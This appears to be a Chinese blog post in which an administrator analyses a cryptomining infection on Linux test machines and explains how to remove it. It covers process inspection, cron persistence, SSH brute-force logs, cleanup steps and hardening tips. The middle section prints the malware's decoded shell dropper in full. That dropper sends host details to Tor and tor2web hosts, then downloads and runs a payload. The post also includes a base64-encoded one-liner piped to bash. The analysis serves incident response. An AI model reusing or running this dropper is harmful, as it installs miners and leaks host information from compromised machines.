最近我的测试虚拟机有点异常，发现有个奇怪的名为 VP0eryom 的进程，cpu占用率特别高，于是自己就折腾着分析，试着找出原因，看了进程连的ip才知道是中了挖矿病毒，下面是简单分析过程。

1、top命令发现异常进程

此进程名称有点奇怪（挖矿病毒进程一般都是这种名称，8个字符组成）。

2、strace追踪进程

试着strace看下这个进程到底在干啥，结果发现里面一直在epoll_pwait什么：

3、netstat查看是否有该进程相关网络连接

 网上查到该ip 94.176.237.229 的相关信息，是一个跟挖矿病毒有关的服务器。

4、lsof查看该进程打开的文件

ls -l /proc/28796/exe

可以查看到该进程的程序文件，实际就是图中的  /root/fedd8e32ccb857edb55c14e78ec2591e 文件，可以看到它已经标记为del，被删掉了。

下面是我另外一台上俩病毒进程信息：

另外还有个文件/tmp/.X11-unix/11，它的内容为该进程的pid；还有个/tmp/.X11-unix/01文件，它的内容为另外一个病毒脚本进程的pid，是病毒用来锁定文件用的。

5、crontab查看到病毒设定的定时任务

[root@localhost ~]# crontab -l
7 * * * * /root/.systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H.sh > /dev/null 2>&1 &
[root@localhost ~]#

可以在/etc/cron.d/下面有个 0systemd-private-xxx 的文件，cat查看其内容就是上面crontab -l的输出：

/root/.systemd-private-xxx.sh文件跟/opt/systemd-private-xxx.sh文件是一样的。

6、解析挖矿病毒脚本

查看上面定时任务中指定的脚本文件内容：

用base64工具解析后：

下面我把内容贴出来了：

S7vPga3usraBPi9WeyVrgQXZ0fVGN90H
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "asbrvuy5eytinisxv7jzno26lererj55ryvomhht6iw7tmcbbyswebid")

sockz() {
n=(dns.digitale-gesellschaft.ch doh.li doh.pub fi.doh.dns.snopyta.org hydra.plan9-ns1.com resolver-eu.lelux.fi dns.hostux.net dns.twnic.tw doh-fi.blahdns.com resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
q=${n[$((RANDOM%${#n[@]}))]}
s=$($c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done

下面 简单解析下脚本内容：

①exec &>/dev/null 将该脚本至于后台执行，并且不打印出任何内容

②d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6) 则是获取当前用户的$HOME路径

③c=$(echo "curl -4fsSLkA- -m200")，下面的 sockz 函数中使用该curl命令，基于http协议的dns解析ipv4 relay.tor2socks.in域名的地址，从以下域名中获取：

dns.digitale-gesellschaft.ch 
doh.li doh.pub 
fi.doh.dns.snopyta.org 
hydra.plan9-ns1.com 
resolver-eu.lelux.fi 
dns.hostux.net 
dns.twnic.tw 
doh-fi.blahdns.com 
resolver-eu.lelux.fi 
doh.li dns.digitale-gesellschaft.ch

如：

[root@localhost ~]# curl -4fsSLkA- -m200 https://doh.pub/dns-query?name=relay.tor2socks.in
{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"relay.tor2socks.in.","type":1}],"Answer":[{"name":"relay.tor2socks.in.","type":1,"TTL":25,"Expires":"Mon, 20 Dec 2021 15:13:07 UTC","data":"139.177.194.70"}],"edns_client_subnet":"119.28.122.4/0"}
[root@localhost ~]# 
[root@localhost ~]# $c https://$q/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|tail -1
139.177.194.70

④ fexe 函数是在用户的主目录、/tmp、/var/tmp 和 /usr/bin 目录中创建一个名为 i 的文件，内容为exit， 然后它尝试执行该文件并将其删除。 这旨在查找恶意软件可以在其中写入和执行文件的目录。

⑤ u 函数发送http请求到/cmd路径，然后到硬编码的TOR域，然后启动执行后删除文件。

其中 curl -4fsSLk checkip.amazonaws.com || curl -4fsSLk ip.sb 命令可以用来获取本机外网ip地址。

另外我在另一台中病毒的机器上发现/opt下还有个systemd-service.sh文件，脚本内容跟上面分析的差不多，如下：

[root@localhost ~]# cat /opt/systemd-service.sh
#!/bin/bash
exec &>/dev/null
echo nR5+1jkQQI+7TgJbl1oPCUWmJ4txeU1yoaDfvYVyk3S40XkQYcfH6obd7/MO/1Tt
echo blI1KzFqa1FRSSs3VGdKYmwxb1BDVVdtSjR0eGVVMXlvYURmdllWeWszUzQwWGtRWWNmSDZvYmQ3L01PLzFUdApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJqaTU1ampwbHBrbms3ZWF5eHh0YjVvM3VseHVldm50dXRzZGFub3Y1ZHAzd3lhN2w3YnRqdjRxZCIpCgpzb2NreigpIHsKbj0oZG9oLm5sLmFoYWRucy5uZXQgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLm5vLmFoYWRucy5uZXQgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCBvbmlvbi5mb3VuZGF0aW9uIG9uaW9uLmNvbS5kZSBvbmlvbi5zaCB0b3Iyd2ViLnN1IApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d|bash
[root@localhost ~]# 
[root@localhost ~]# 
[root@localhost ~]# echo blI1KzFqa1FRSSs3VGdKYmwxb1BDVVdtSjR0eGVVMXlvYURmdllWeWszUzQwWGtRWWNmSDZvYmQ3L01PLzFUdApleGVjICY+L2Rldi9udWxsCmV4cG9ydCBQQVRIPSRQQVRIOiRIT01FOi9iaW46L3NiaW46L3Vzci9iaW46L3Vzci9zYmluOi91c3IvbG9jYWwvYmluOi91c3IvbG9jYWwvc2JpbgoKZD0kKGdyZXAgeDokKGlkIC11KTogL2V0Yy9wYXNzd2R8Y3V0IC1kOiAtZjYpCmM9JChlY2hvICJjdXJsIC00ZnNTTGtBLSAtbTIwMCIpCnQ9JChlY2hvICJqaTU1ampwbHBrbms3ZWF5eHh0YjVvM3VseHVldm50dXRzZGFub3Y1ZHAzd3lhN2w3YnRqdjRxZCIpCgpzb2NreigpIHsKbj0oZG9oLm5sLmFoYWRucy5uZXQgZG5zLmhvc3R1eC5uZXQgdW5jZW5zb3JlZC5sdXgxLmRucy5uaXhuZXQueHl6IGRucy5ydWJ5ZmlzaC5jbiBkbnMudHduaWMudHcgZG9oLm5vLmFoYWRucy5uZXQgZG9oLWZpLmJsYWhkbnMuY29tIGZpLmRvaC5kbnMuc25vcHl0YS5vcmcgcmVzb2x2ZXItZXUubGVsdXguZmkgZG9oLmxpIGRucy5kaWdpdGFsZS1nZXNlbGxzY2hhZnQuY2gpCnA9JChlY2hvICJkbnMtcXVlcnk/bmFtZT1yZWxheS50b3Iyc29ja3MuaW4iKQpzPSQoJGMgaHR0cHM6Ly8ke25bJCgoUkFORE9NJTExKSldfS8kcCB8IGdyZXAgLW9FICJcYihbMC05XXsxLDN9XC4pezN9WzAtOV17MSwzfVxiIiB8dHIgJyAnICdcbid8Z3JlcCAtRXYgWy5dMHxzb3J0IC11UnxoZWFkIC1uIDEpCn0KCmZleGUoKSB7CmZvciBpIGluIC4gJEhPTUUgL3Vzci9iaW4gJGQgL3Zhci90bXAgO2RvIGVjaG8gZXhpdCA+ICRpL2kgJiYgY2htb2QgK3ggJGkvaSAmJiBjZCAkaSAmJiAuL2kgJiYgcm0gLWYgaSAmJiBicmVhaztkb25lCn0KCnUoKSB7CnNvY2t6CmY9L2ludC4kKHVuYW1lIC1tKQp4PS4vJChkYXRlfG1kNXN1bXxjdXQgLWYxIC1kLSkKcj0kKGN1cmwgLTRmc1NMayBjaGVja2lwLmFtYXpvbmF3cy5jb218fGN1cmwgLTRmc1NMayBpcC5zYilfJCh3aG9hbWkpXyQodW5hbWUgLW0pXyQodW5hbWUgLW4pXyQoaXAgYXxncmVwICdpbmV0ICd8YXdrIHsncHJpbnQgJDInfXxtZDVzdW18YXdrIHsncHJpbnQgJDEnfSlfJChjcm9udGFiIC1sfGJhc2U2NCAtdzApCiRjIC14IHNvY2tzNWg6Ly8kczo5MDUwICR0Lm9uaW9uJGYgLW8keCAtZSRyIHx8ICRjICQxJGYgLW8keCAtZSRyCmNobW9kICt4ICR4OyR4O3JtIC1mICR4Cn0KCmZvciBoIGluIHRvcjJ3ZWIuaW4gdG9yMndlYi5pdCBvbmlvbi5mb3VuZGF0aW9uIG9uaW9uLmNvbS5kZSBvbmlvbi5zaCB0b3Iyd2ViLnN1IApkbwppZiAhIGxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXM7IHRoZW4KZmV4ZTt1ICR0LiRoCmxzIC9wcm9jLyQoaGVhZCAtbiAxIC90bXAvLlgxMS11bml4LzAxKS9zdGF0dXMgfHwgKGNkIC90bXA7dSAkdC4kaCkKbHMgL3Byb2MvJChoZWFkIC1uIDEgL3RtcC8uWDExLXVuaXgvMDEpL3N0YXR1cyB8fCAoY2QgL2Rldi9zaG07dSAkdC4kaCkKZWxzZQpicmVhawpmaQpkb25lCg==|base64 -d
nR5+1jkQQI+7TgJbl1oPCUWmJ4txeU1yoaDfvYVyk3S40XkQYcfH6obd7/MO/1Tt
exec &>/dev/null
export PATH=$PATH:$HOME:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin

d=$(grep x:$(id -u): /etc/passwd|cut -d: -f6)
c=$(echo "curl -4fsSLkA- -m200")
t=$(echo "ji55jjplpknk7eayxxtb5o3ulxuevntutsdanov5dp3wya7l7btjv4qd")

sockz() {
n=(doh.nl.ahadns.net dns.hostux.net uncensored.lux1.dns.nixnet.xyz dns.rubyfish.cn dns.twnic.tw doh.no.ahadns.net doh-fi.blahdns.com fi.doh.dns.snopyta.org resolver-eu.lelux.fi doh.li dns.digitale-gesellschaft.ch)
p=$(echo "dns-query?name=relay.tor2socks.in")
s=$($c https://${n[$((RANDOM%11))]}/$p | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" |tr ' ' '\n'|grep -Ev [.]0|sort -uR|head -n 1)
}

fexe() {
for i in . $HOME /usr/bin $d /var/tmp ;do echo exit > $i/i && chmod +x $i/i && cd $i && ./i && rm -f i && break;done
}

u() {
sockz
f=/int.$(uname -m)
x=./$(date|md5sum|cut -f1 -d-)
r=$(curl -4fsSLk checkip.amazonaws.com||curl -4fsSLk ip.sb)_$(whoami)_$(uname -m)_$(uname -n)_$(ip a|grep 'inet '|awk {'print $2'}|md5sum|awk {'print $1'})_$(crontab -l|base64 -w0)
$c -x socks5h://$s:9050 $t.onion$f -o$x -e$r || $c $1$f -o$x -e$r
chmod +x $x;$x;rm -f $x
}

for h in tor2web.in tor2web.it onion.foundation onion.com.de onion.sh tor2web.su 
do
if ! ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status; then
fexe;u $t.$h
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /tmp;u $t.$h)
ls /proc/$(head -n 1 /tmp/.X11-unix/01)/status || (cd /dev/shm;u $t.$h)
else
break
fi
done
[root@localhost ~]# 
[root@localhost ~]# 

7、排查系统audit的ssh爆破日志

 

可以看到另一台机器对本机进行ssh爆破，最后上千次尝试后成功爆破。

8、清除挖矿病毒文件

①定时任务清除

crontab -e删除定时任务

删除/etc/cron.d/下面的0systemd-private-xxx文件

②删除/opt/下面的systemd-private-xxxx.sh、systemd-service.sh文件

[root@localhost ~]# ll /opt/systemd-*
-rwxr-xr-x. 1 root root 2023 Aug  3  2017 /opt/systemd-private-XewOnVlZVlcq2RdzuRgG1iX0mneBTh3.sh
-rwxr-xr-x. 1 root root 2124 Aug  3  2017 /opt/systemd-service.sh
[root@localhost ~]# 

③删除$HOME下.systemd-private-xxxx.sh文件

④kill -9删掉病毒进程，一般长存的有两个，进程名特征一样，8个字符组成

[root@localhost ~]# rm -rf /opt/systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H.sh 
[root@localhost ~]# rm -rf /etc/cron.d/
0systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H  raid-check                                         
[root@localhost ~]# rm -rf /etc/cron.d/0systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H 
[root@localhost ~]# 
[root@localhost ~]# rm -rf /root/.systemd-private-S7vPga3usraBPi9WeyVrgQXZ0fVGN90H.sh 
[root@localhost ~]# 
[root@localhost ~]# 

清除后，最好重启下。

9、安全措施

①主机要使用无规律的强密码，而且定时更新下密码，各台服务器不要使用相同密码。

②部署安全防护及监控系统，尽早发现病毒，及时处理。

更深入分析可以看Malware Analysis of the DreamBus Botnet | Zscaler Blog博客文章。